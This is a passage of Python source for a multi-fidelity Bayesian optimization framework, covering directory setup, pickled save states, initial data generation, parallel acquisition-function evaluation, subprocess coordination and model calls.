os.mkdir('{}/results/{}'.format(self.workingDir, \n self.calculationName))\n self.logger.debug(\"Calculation Results Directory [{}] Created Successfully\".format(self.calculationName))\n except FileExistsError:\n self.logger.debug(\"Calculation Results Directory [{}] Already Exists\".format(self.calculationName))\n # If using subprocesses, create the folder structure needed\n if self.multinode != 0:\n if os.path.exists('{}/subprocess'.format(self.workingDir)):\n rmtree('{}/subprocess'.format(self.workingDir))\n self.logger.debug(\"Existing Subprocess Directory Removed\")\n os.mkdir('{}/subprocess'.format(self.workingDir))\n os.mkdir('{}/subprocess/LSFOut'.format(self.workingDir))\n self.logger.debug(\"Subprocess Directory Created\")\n \n def __create_output_dataframes(self):\n # The output of the framework is contained in two pandas dataframes\n # the evaluatedPoints df contains all the points that have been \n # evaluated from all models\n labels1 = [\"Model Index\", \"Iteration\", \"y\"]\n for ii in range(self.nDim):\n labels1.append(\"x{}\".format(ii))\n self.inputLabels.append(\"x{}\".format(ii))\n self.evaluatedPoints = pd.DataFrame(columns=labels1)\n # the iterationData df shows the iterations, model calls and maximum \n # value found\n labels2 = [\"Iteration\", \"Max Found\", \"Calculation Time\", \"Truth Model\"]\n for ii in range(len(self.ROM)):\n labels2.append(\"ROM {}\".format(ii))\n self.iterationData = pd.DataFrame(columns=labels2)\n self.logger.debug(\"Output Dataframes Created\")\n \n def __save_output_dataframes(self):\n # The dataframes are saved in two forms, first a pickled version of the\n # dataframe, and also a csv version for readability\n with open('{}/results/{}/evaluatedPoints'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(self.evaluatedPoints, f)\n self.evaluatedPoints.to_csv('{}/results/{}/evaluatedPoints.csv'.format(self.workingDir, self.calculationName))\n with open('{}/results/{}/iterationData'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(self.iterationData, f)\n self.iterationData.to_csv('{}/results/{}/iterationData.csv'.format(self.workingDir, self.calculationName))\n # for the GP Hedge approach, the choice of model for each iteration is\n # also saved to a separate file\n hedge_out = {\"ROM\":[], \"TM\":[]}\n if self.acquisitionFunc == \"Hedge\":\n hedge_out[\"ROM\"] = self.gpHedgeTrack\n if self.tmSampleOpt == \"Hedge\":\n hedge_out[\"TM\"] = self.gpHedgeTrackTM\n if self.acquisitionFunc == \"Hedge\" or self.tmSampleOpt == \"Hedge\":\n with open('{}/results/{}/hedgeRecord'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(hedge_out, f)\n self.logger.info(\"Dataframes Pickled and Dumped to Results Directory\")\n \n def __save_calculation_state(self):\n # This function saves the entire barefoot object into a pickle file\n with open('{}/data/{}_save_state'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(self, f)\n self.logger.info(\"Calculation State Saved\")\n \n def __load_from_save(self, workingDir, calculationName):\n # This function restores the barefoot object parameters from a saved\n # pickle file. In order for this to work, each variable of the object\n # is restored separately.\n try:\n with open('{}/data/{}_save_state'.format(workingDir, calculationName), 'rb') as f:\n saveState = load(f)\n self.logger.debug(\"Save State File Found\")\n for item in vars(saveState).items():\n setattr(self, item[0], item[1])\n except FileNotFoundError:\n self.loadFailed = True\n self.logger.warning(\"Could not find Save State File\")\n \n def __add_to_evaluatedPoints(self, modelIndex, eval_x, eval_y):\n # Adds new data points to the evaluated datapoints dataframe\n temp = np.zeros((eval_x.shape[0], self.nDim+3))\n temp[:,0] = modelIndex\n temp[:,1] = self.currentIteration\n temp[:,2] = eval_y\n temp[:,3:] = eval_x\n temp = pd.DataFrame(temp, columns=self.evaluatedPoints.columns)\n self.evaluatedPoints = pd.concat([self.evaluatedPoints,temp])\n self.logger.debug(\"{} New Points Added to Evaluated Points Dataframe\".format(eval_x.shape[0]))\n \n def __add_to_iterationData(self, calcTime, iterData):\n # Adds new data points to the Iteration Data Dataframe\n temp = np.zeros((1,4+len(self.ROM)))\n temp[0,0] = self.currentIteration\n temp[0,1] = self.maxTM\n temp[0,2] = calcTime\n temp[0,3] = iterData[-1]\n temp[0,4:] = iterData[0:len(self.ROM)]\n temp = pd.DataFrame(temp, columns=self.iterationData.columns)\n self.iterationData = pd.concat([self.iterationData,temp])\n self.logger.debug(\"Iteration {} Data saved to Dataframe\".format(self.currentIteration))\n \n def __get_initial_data__(self):\n # Function for obtaining the initial data either by calculation or by \n # extracting the data from a file.\n params = []\n count = []\n param_index = 0\n self.maxTM = -np.inf\n if self.acquisitionFunc == \"Hedge\":\n self.gpHedgeHist = [[np.random.random()],[np.random.random()],\n [np.random.random()],[np.random.random()]]\n self.gpHedgeProb = np.sum(self.gpHedgeHist, axis=1)\n self.gpHedgeTrack = []\n if self.tmSampleOpt == \"Hedge\":\n self.gpHedgeHistTM = [[np.random.random()],[np.random.random()],\n [np.random.random()],[np.random.random()]]\n self.gpHedgeProbTM = np.sum(self.gpHedgeHistTM, axis=1)\n self.gpHedgeTrackTM = []\n # Check if data needs to be calculated or extracted\n if self.calcInitData:\n self.logger.debug(\"Start Calculation of Initial Data\")\n # obtain LHS initial data for each reduced order model\n for ii in range(len(self.ROM)):\n count.append(0) \n initInput, check = apply_constraints(self.initDataPathorNum[ii], \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func)\n if check:\n self.logger.debug(\"Initial Data - All constraints applied successfully\")\n else:\n self.logger.critical(\"Initial Data - Some or All Constraints Could not Be applied! Continuing Without Constraints\")\n \n for jj in range(self.initDataPathorNum[ii]):\n params.append({\"Model Index\":ii,\n \"Model\":self.ROM[ii],\n \"Input Values\":initInput[jj,:],\n \"ParamIndex\":param_index})\n param_index += 1\n self.ROMInitInput.append(np.zeros_like(initInput))\n self.ROMInitOutput.append(np.zeros(self.initDataPathorNum[ii]))\n count.append(0)\n # Obtain LHS initial data for Truth Model\n initInput, check = apply_constraints(self.initDataPathorNum[ii+1], \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func)\n if check:\n self.logger.debug(\"Initial Data - All constraints applied successfully\")\n else:\n self.logger.critical(\"Initial Data - Some or All Constraints Could not Be applied! Continuing Without Constraints\")\n for jj in range(self.initDataPathorNum[-1]):\n params.append({\"Model Index\":-1,\n \"Model\":self.TM,\n \"Input Values\":initInput[jj,:],\n \"ParamIndex\":param_index})\n param_index += 1\n self.TMInitInput = np.zeros_like(initInput)\n self.TMInitOutput = np.zeros(self.initDataPathorNum[-1])\n \n # Calculate all the initial data in parallel\n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params))\n self.logger.debug(\"Parameters Defined. Starting Concurrent.Futures Calculation\")\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n if par[\"Model Index\"] != -1:\n self.ROMInitInput[par[\"Model Index\"]][count[par[\"Model Index\"]],:] = par[\"Input Values\"]\n self.ROMInitOutput[par[\"Model Index\"]][count[par[\"Model Index\"]]] = results\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n else:\n self.TMInitInput[count[par[\"Model Index\"]],:] = par[\"Input Values\"]\n self.TMInitOutput[count[par[\"Model Index\"]]] = results\n if np.max(results) > self.maxTM:\n self.maxTM = np.max(results)\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n count[par[\"Model Index\"]] += 1\n self.logger.debug(\"Concurrent.Futures Calculation Completed\")\n else:\n # extract the initial data from the file\n self.logger.debug(\"Start Loading Initial Data from Files\")\n with open(self.initDataPathorNum, 'rb') as f:\n data = load(f)\n \n # extract data from dictionary in file and assign to correct variables\n self.TMInitOutput = data[\"TMInitOutput\"]\n self.TMInitInput = data[\"TMInitInput\"]\n self.ROMInitOutput = data[\"ROMInitOutput\"]\n self.ROMInitInput = data[\"ROMInitInput\"]\n \n ROMSize = 0\n for mmm in range(len(self.ROMInitInput)):\n ROMSize += self.ROMInitOutput[mmm].shape[0]\n \n temp_x = np.zeros((self.TMInitOutput.shape[0]+ROMSize, \n self.nDim))\n temp_y = np.zeros(self.TMInitOutput.shape[0]+ROMSize)\n temp_index = np.zeros(self.TMInitOutput.shape[0]+ROMSize)\n \n ind = 0\n \n for ii in range(len(self.ROM)):\n for jj in range(self.ROMInitOutput[ii].shape[0]):\n temp_x[ind,:] = self.ROMInitInput[ii][jj,:]\n temp_y[ind] = self.ROMInitOutput[ii][jj]\n temp_index[ind] = ii\n ind += 1\n count.append(self.ROMInitInput[ii].shape[0])\n for jj in range(self.TMInitOutput.shape[0]):\n temp_x[ind,:] = self.TMInitInput[jj,:]\n temp_y[ind] = self.TMInitOutput[jj]\n if self.TMInitOutput[jj] > self.maxTM:\n self.maxTM = self.TMInitOutput[jj]\n temp_index[ind] = -1\n ind += 1\n count.append(self.TMInitInput.shape[0])\n self.logger.debug(\"Loading Data From File Completed\")\n # Add initial data to dataframes\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n self.__add_to_iterationData(time()-self.timeCheck, np.array(count))\n self.logger.debug(\"Initial Data Saved to Dataframes\")\n self.timeCheck = time()\n \n def initialize_parameters(self, modelParam, covFunc=\"M32\", iterLimit=100, \n sampleCount=50, hpCount=100, batchSize=5, \n tmIter=1e6, totalBudget=1e16, tmBudget=1e16, \n upperBound=1, lowBound=0.0001, fusedPoints=5):\n \"\"\"\n This function sets the conditions for the barefoot framework calculations.\n All parameters have default values except the model parameters.\n\n Parameters\n ----------\n modelParam : TYPE\n This must be a dictionary with the hyperparameters for the reduced\n order models as well as the costs for all the models. The specific\n values in the dictionary must be:\n 'model_l': A list with the characteristic length scale for each\n dimension in each reduced order model GP.\n eg 2 reduced order - 3 dimension models\n [[0.1,0.1,0.1],[0.2,0.2,0.2]]\n 'model_sf': A list with the signal variance for each reduced\n order model GP.\n 'model_sn': A list with the noise variance for each reduced\n order model GP.\n 'means': A list of the mean of each model. Set to 0 if the mean\n is not known\n 'std': A list of the standard deviations of each model. Set to 1\n if the standard deviation is not known.\n 'err_l': A list with the characteristic length scale for each\n dimension in each discrepancy GP. Must match dimensions\n of model_l\n 'err_sf': A list with the signal variance for each discrepancy GP.\n 'err_sn': A list with the noise variance for each discrepancy GP.\n 'costs': The model costs, including the Truth Model\n eg. 2 ROM : [model 1 cost, model 2 cost, Truth model cost]\n covFunc : TYPE, optional\n The covariance function to used for the Gaussian Process models.\n Options are Squared Exponential (\"SE\") Matern 3/2 (\"M32\") and \n Matern 5/2 (\"M52\"). The default is \"M32\".\n iterLimit : TYPE, optional\n How many iterations to run the framework calculation before\n terminating. The default is 100.\n sampleCount : TYPE, optional\n The number of samples to use for the acquisition function calculations.\n The default is 50.\n hpCount : TYPE, optional\n The number of hyperparameter sets to use. The default is 100.\n batchSize : TYPE, optional\n The batch size for the model evaluations. The default is 5.\n tmIter : TYPE, optional\n The number of iterations to complete before querying the Truth Model. \n The default is 1e6.\n totalBudget : TYPE, optional\n The total time budget to expend before terminating the calculation. \n The default is 1e16.\n tmBudget : TYPE, optional\n The budget to expend before querying the Truth Model. The default \n is 1e16.\n upperBound : TYPE, optional\n The upper bound for the hyperparameters. The default is 1.\n lowBound : TYPE, optional\n The lower bound for the hyperparameters. The default is 0.0001.\n fusedPoints : TYPE, optional\n The number of points per dimension for the linear grid used to \n evaluate the fused mean and variance for building the fused model. \n The default is 5.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.logger.debug(\"Start Initializing Reification Object Parameters\")\n self.covFunc = covFunc \n self.iterLimit = iterLimit \n self.sampleCount = sampleCount \n self.hpCount = hpCount \n self.batchSize = batchSize\n self.tmIterLim = tmIter \n self.totalBudget = totalBudget\n self.tmBudget = tmBudget\n self.upperBound = upperBound\n self.lowBound = lowBound\n self.modelParam = modelParam\n self.modelCosts = modelParam[\"costs\"]\n # The numpy linspace module will contract the distance below 1 if there\n # are also values above 1. The approach implemented here avoids that\n # situation\n if self.upperBound > 1:\n midway = (self.hpCount - (self.hpCount % 2))/2\n lower = np.linspace(self.lowBound, 1.0, num=int(midway), endpoint=False)\n upper = np.linspace(1.0, self.upperBound, num=int(midway)+int(self.hpCount % 2), endpoint=True)\n all_HP = np.append(lower, upper)\n else:\n all_HP = np.linspace(self.lowBound, self.upperBound, num=self.hpCount, endpoint=True)\n # randomly combine the options for the hyperparameters into the hyperparameter sets\n self.fusedModelHP = np.zeros((self.hpCount,self.nDim+1))\n for i in range(self.hpCount):\n for j in range(self.nDim+1):\n self.fusedModelHP[i,j] = all_HP[np.random.randint(0,self.hpCount)]\n # create the evaluation points for determining the fused mean and\n # variance\n temp = np.linspace(0,1,num=fusedPoints)\n arr_list = []\n for ii in range(self.nDim):\n arr_list.append(temp)\n self.xFused = cartesian(*arr_list)\n self.logger.debug(\"Create Reification Object\")\n # build the reification object with the combined inputs and initial values\n self.reificationObj = model_reification(self.ROMInitInput, self.ROMInitOutput, \n self.modelParam['model_l'], \n self.modelParam['model_sf'], \n self.modelParam['model_sn'], \n self.modelParam['means'], \n self.modelParam['std'], \n self.modelParam['err_l'], \n self.modelParam['err_sf'], \n self.modelParam['err_sn'], \n self.TMInitInput, self.TMInitOutput, \n len(self.ROM), self.nDim, self.covFunc)\n self.allTMInput = []\n self.allTMOutput = []\n self.tmBudgetLeft = self.tmBudget\n self.totalBudgetLeft = self.totalBudget\n self.currentIteration += 1\n self.tmIterCount = 0\n self.logger.info(\"Reification Object Initialized. Ready for Calculations\")\n \n def __restart_subs(self):\n # This function restarts the sub processes if they have been closed\n # while doing the Truth Model evaluations\n for kk in range(self.multinode):\n try:\n os.remove(\"{}/subprocess/close{}\".format(self.workingDir, kk))\n os.remove(\"{}/subprocess/sub{}.control\".format(self.workingDir, kk))\n os.remove(\"{}/subprocess/sub{}.start\".format(self.workingDir, kk))\n self.logger.debug(\"Close File {} removed\".format(kk))\n except FileNotFoundError:\n self.logger.debug(\"Close File {} does not exist\".format(kk))\n \n calcPerProcess, all_started = self.__start_subprocesses__(self.multinode)\n subProcessWait = True\n while subProcessWait:\n if all_started:\n subProcessWait = False\n else:\n total_started = 0\n for fname in range(self.multinode):\n if os.path.exists(\"{}/subprocess/sub{}.start\".format(self.workingDir, fname)):\n total_started += 1\n if total_started == self.multinode:\n all_started = True\n self.logger.info(\"All Subprocess Jobs Started Successfully\")\n \n def __run_multinode_acq_func(self, x_test, new_mean, calcPerProcess):\n # This function controls the parameter setup and transfer for the\n # evaluation of the acquisition functions to determine the next best\n # points for evaluating the Reduced Order Models when using subprocesses\n self.logger.info(\"Set Up Parameters for Acquisition Function Evaluation and submit to Subprocesses\")\n parameters = []\n parameterFileData = []\n sub_fnames = []\n count = 0\n sub_count = 0\n parameterIndex = 0\n parameterFileIndex = 0\n # Pickle the reification object to be loaded by each of the subprocesses\n # this reduces the amount of memory that needs to be transferred\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n # set up the parameters to be used in the calculations\n for jj in range(len(self.ROM)):\n for kk in range(self.sampleCount):\n model_temp = [np.expand_dims(x_test[kk], axis=0), \n np.expand_dims(np.array([new_mean[jj][kk]]), axis=0), \n jj]\n\n for mm in range(self.hpCount):\n parameterFileData.append((1, model_temp, self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, x_test, jj, kk, mm, self.sampleCount,\n self.modelParam['costs'], self.maxTM))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n \n # store every 1000 set of parameters in a file for use in the\n # subprocesses\n if len(parameterFileData) == 1000:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n count += 1\n if count == calcPerProcess:\n fname = \"{}\".format(sub_count)\n sub_fnames.append(fname)\n \n # Send the trigger for the subprocess to pick up the data for\n # the calculations\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"iteration\", self.acquisitionFunc]\n dump(control_param, f)\n # dump the index for the parameter files for the subprocess\n # to load\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n \n parameters = []\n count = 0\n sub_count += 1\n \n # dump the last of the parameter datasets\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n # trigger the last subprocess and dump the index parameters\n if parameters != []:\n fname = \"{}\".format(sub_count)\n sub_fnames.append(fname)\n \n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"iteration\", self.acquisitionFunc]\n dump(control_param, f)\n\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n \n self.logger.info(\"Start Waiting for Results to Complete\")\n # the calculations will take some time, so start a sleep timer to wait\n # for a minute before starting to check for results\n calc_start = time()\n sleep(60)\n \n finished = 0\n \n process_costs = np.zeros((len(sub_fnames)))\n # check for finished subprocess calculations, and only continue once\n # all subprcesses calculations are completed\n while finished < len(sub_fnames):\n finished = 0\n proc_count = 0\n for sub_name in sub_fnames:\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_name), 'rb') as f:\n control_param = load(f)\n if control_param[0] == 1:\n finished += 1\n if process_costs[proc_count] == 0:\n # When a subprocess has completed, record how long\n # the subprocess ran for. This is the cost of the \n # subprocess calculation\n process_costs[proc_count] = time()-calc_start\n if finished < len(sub_fnames): \n sleep(60)\n \n self.logger.info(\"Acquisition Function Evaluations Completed\")\n # Calculate the total subprocess cost.\n process_cost = np.sum(process_costs)\n \n # extract all the outputs from the subprocesses and collate them\n # into a single array\n kg_output = []\n for sub_name in sub_fnames:\n cont_loop = True\n load_failed = True\n timer = 0\n while cont_loop:\n try:\n with open(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name), 'rb') as f:\n sub_output = load(f)\n load_failed = False\n cont_loop = False\n except FileNotFoundError:\n sleep(30)\n timer += 30\n if timer > 300:\n cont_loop = False\n \n if not load_failed:\n self.logger.debug(\"sub_output {} found | length: {}\".format(sub_name, len(sub_output)))\n for jj in range(len(sub_output)):\n kg_output.append(sub_output[jj])\n os.remove(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name))\n os.remove(\"{}/subprocess/{}.dump\".format(self.workingDir, sub_name))\n else:\n self.logger.debug(\"sub_output {} NOT found\".format(len(sub_name)))\n self.logger.debug(\"Calculation Results retrieved from Subprocess Jobs\")\n return kg_output, process_cost\n \n def __run_singlenode_acq_func(self, x_test, new_mean): \n # As before, this function calculates the acquisition function values\n # for determining the next best points to be queried from the reduced\n # order models. This function runs the concurrent.futures calculations\n # directly.\n parameters = []\n parameterFileData = []\n count = 0\n parameterIndex = 0\n parameterFileIndex = 0\n self.logger.debug(\"Set Up Parameters for Acquisition Function Evaluation\")\n # Save the current reification object to a file for loading\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n # Define the parameters for each calculation\n for jj in range(len(self.ROM)):\n for kk in range(self.sampleCount):\n model_temp = [np.expand_dims(x_test[kk], axis=0), \n np.expand_dims(np.array([new_mean[jj][kk]]), axis=0), \n jj]\n\n for mm in range(self.hpCount):\n parameterFileData.append((1, model_temp, self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, x_test, jj, kk, mm, self.sampleCount,\n self.modelParam['costs'], self.maxTM))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n # save each 1000 parameter sets to a file to reduce the amount of memory used\n if len(parameterFileData) == 1000:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n count += 1\n # save the last of the parameters sets\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n # set which acquistion function will be used\n if self.acquisitionFunc == \"EI\":\n acqFunc = calculate_EI\n elif self.acquisitionFunc == \"KG\":\n acqFunc = calculate_KG\n elif self.acquisitionFunc == \"TS\":\n acqFunc = calculate_TS\n elif self.acquisitionFunc == \"Hedge\":\n acqFunc = calculate_GPHedge\n elif self.acquisitionFunc == \"Greedy\":\n acqFunc = calculate_Greedy\n kg_output = []\n # Start the concurrent calculations and return the output array\n self.logger.info(\"Start Acquisition Function Evaluations for {} Parameter Sets\".format(len(parameters)))\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(acqFunc,parameters)):\n params, results = result_from_process\n kg_output.append(results)\n self.logger.info(\"Acquisition Function Evaluations Completed\")\n return kg_output, 0 \n \n def __run_multinode_fused(self, tm_test):\n # As with the reduced order model calculations, this function evaluates\n # the selected acquisition function to determine the next best points to \n # evaluate from the Truth model\n \n # Since this set of calculations uses only the hyperparameter count,\n # a new calculation is needed to determine how many calculations to\n # do on each subprocess\n calc_limit = (-(-self.hpCount//self.multinode)) \n self.logger.debug(\"Define Parameters for Max Value Evaluations\")\n parameters = []\n parameterFileData = []\n parameterIndex = 0\n parameterFileIndex = 0\n count = 0\n sub_count = 0\n sub_fnames = []\n # Save the reification object to a file\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n for mm in range(self.hpCount):\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, tm_test, self.maxTM, 0.01, self.tmSampleOpt))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n count += 1\n \n # Save every 500 parameter sets to a separate file to reduce memory\n # usage\n if len(parameterFileData) == 500:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n \n if count == calc_limit:\n fname = \"{}\".format(sub_count)\n sub_fnames.append(fname)\n # Trigger the subprocesses with a new calculation set\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"fused\", self.acquisitionFunc]\n dump(control_param, f)\n # save the parameter indices to a file\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n \n parameters = []\n count = 0\n sub_count += 1\n # save the last of the parameter sets to a file\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n \n if parameters != []:\n fname = \"{}\".format(sub_count)\n sub_fnames.append(fname)\n # Trigger the final subprocess to start calculations\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"fused\", self.acquisitionFunc]\n dump(control_param, f)\n # dump the parameter indices to a file\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n\n self.logger.info(\"Parameters for Max Value Calculations Sent to Subprocess\")\n # wait for calculations to finish\n sleep(60)\n\n finished = 0\n # check that all calculations have completed before continuing\n while finished < len(sub_fnames):\n finished = 0\n for sub_name in sub_fnames:\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_name), 'rb') as f:\n control_param = load(f)\n if control_param[0] == 1:\n finished += 1\n if finished < len(sub_fnames): \n sleep(60) \n \n fused_output = []\n # Extract the outputs from the individual subprocess output files and\n # collate into a single array\n for sub_name in sub_fnames:\n cont_loop = True\n load_failed = True\n timer = 0\n while cont_loop:\n try:\n with open(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name), 'rb') as f:\n sub_output = load(f)\n load_failed = False\n cont_loop = False\n except FileNotFoundError:\n sleep(30)\n timer += 30\n if timer > 300:\n cont_loop = False\n \n if not load_failed:\n self.logger.debug(\"sub_output {} found | length: {}\".format(sub_name, len(sub_output)))\n for jj in range(len(sub_output)):\n fused_output.append(sub_output[jj])\n os.remove(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name))\n os.remove(\"{}/subprocess/{}.dump\".format(self.workingDir, sub_name))\n else:\n self.logger.debug(\"sub_output {} NOT found\".format(len(sub_name)))\n \n # change the format of the output array to be a numpy array\n fused_output = np.array(fused_output, dtype=object)\n if fused_output.shape[0] == 0:\n fused_output = np.array([[0,0]])\n \n self.logger.info(\"Max Value Calculations Completed\")\n return fused_output\n \n def __run_singlenode_fused(self, tm_test):\n # This function achieves the same functionality as the multi-node fused\n # function above, but does it all on the base node, rather than sending the\n # data to subprocesses.\n parameters = []\n parameterFileData = []\n # initialize the parameters for the fused model calculations and\n # start the calculation\n self.logger.debug(\"Define Parameters for Max Value Evaluations\")\n parameterIndex = 0\n parameterFileIndex = 0\n # save the reification object to a separate file\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n for mm in range(self.hpCount):\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, tm_test, self.maxTM, 0.01, self.tmSampleOpt))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n # Save each set of 500 parameters to a separate file\n if len(parameterFileData) == 500:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n # Save the last of the parameter sets to a file\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n \n # Set up a list of outputs for each of the results from the acquisition\n # functions if using the GP Hedge approach\n if self.tmSampleOpt == \"Hedge\":\n fused_out = [[],[],[],[]]\n else:\n # Create just a single list for when using other Acquisition Functions\n fused_output = []\n self.logger.info(\"Start Max Value Calculations | {} Sets\".format(len(parameters)))\n count = 0\n # Run the concurrent processes and save the outputs\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(fused_calculate,parameters)):\n params, results = result_from_process\n if self.tmSampleOpt == \"Hedge\":\n fused_out[0].append(results[0][0])\n fused_out[1].append(results[0][1])\n fused_out[2].append(results[0][2])\n fused_out[3].append(results[0][3])\n else:\n fused_output.append(results[0])\n count += 1\n # When using the GP Hedge approach the list of outputs are returned\n # as-is\n if self.tmSampleOpt == \"Hedge\":\n return fused_out\n # when using other acquisition functions process the output to attempt\n # the removal of all duplicates and then return the processed output\n max_values = np.zeros((results[1],2))\n \n for ii in range(len(fused_output)):\n if max_values[fused_output[ii][1],0] != 0:\n if max_values[fused_output[ii][1],0] < fused_output[ii][0]:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n else:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n \n fused_output = max_values[np.where(max_values[:,0]!=0)]\n \n if fused_output.shape[0] == 0:\n fused_output = np.array([[0,0]])\n \n self.logger.info(\"Max Value Calculations Completed\")\n return fused_output\n\n def __call_ROM(self, medoid_out):\n # This function serves to evaluate the Reduced Order Models at the \n # determined points. This is done in parallel to reduce the time taken\n params = []\n count = np.zeros((len(self.ROM)+1)) \n current = np.array(self.iterationData.iloc[:,3:])[-1,:]\n count[0:len(self.ROM)] = current[1:]\n count[-1] = current[0]\n param_index = 0\n # Define the parameter sets needed for each calculation\n self.logger.debug(\"Define Parameters for ROM Function Evaluations\")\n for iii in range(medoid_out.shape[0]):\n x_index = 6 + self.nDim\n params.append({\"Model Index\":medoid_out[iii,3],\n \"Model\":self.ROM[medoid_out[iii,3]],\n \"Input Values\":np.array(medoid_out[iii,x_index:], dtype=np.float),\n \"ParamIndex\":param_index})\n param_index += 1\n\n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params)) \n costs = np.zeros(len(params))\n # Run the concurrent calculations and extract the results\n self.logger.info(\"Start ROM Function Evaluations | {} Calculations\".format(len(params)))\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n if not self.maximize:\n results = (-1)*results\n self.reificationObj.update_GP(par[\"Input Values\"], results, par[\"Model Index\"])\n costs[par[\"ParamIndex\"]] += self.modelCosts[par[\"Model Index\"]]\n count[par[\"Model Index\"]] += 1\n return temp_x, temp_y, temp_index, costs, count\n \n def __call_Truth(self, params, count):\n # This function evaluates the truth model at the points defined by the \n # framework. The parameters for the calculation are defined elsewhere\n # and this framework just runs the evaluations\n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params)) \n costs = np.zeros(len(params))\n # Run the concurrent calculations and extract the results\n self.logger.info(\"Start Truth Model Evaluations | {} Sets\".format(len(params)))\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n costs[par[\"ParamIndex\"]] += self.modelCosts[par[\"Model Index\"]]\n # if the truth function fails to evaluate, it should return false\n # and therefore the results are not included in the output\n if results != False:\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n count[par[\"Model Index\"]] += 1\n if not self.maximize:\n results = (-1)*results\n 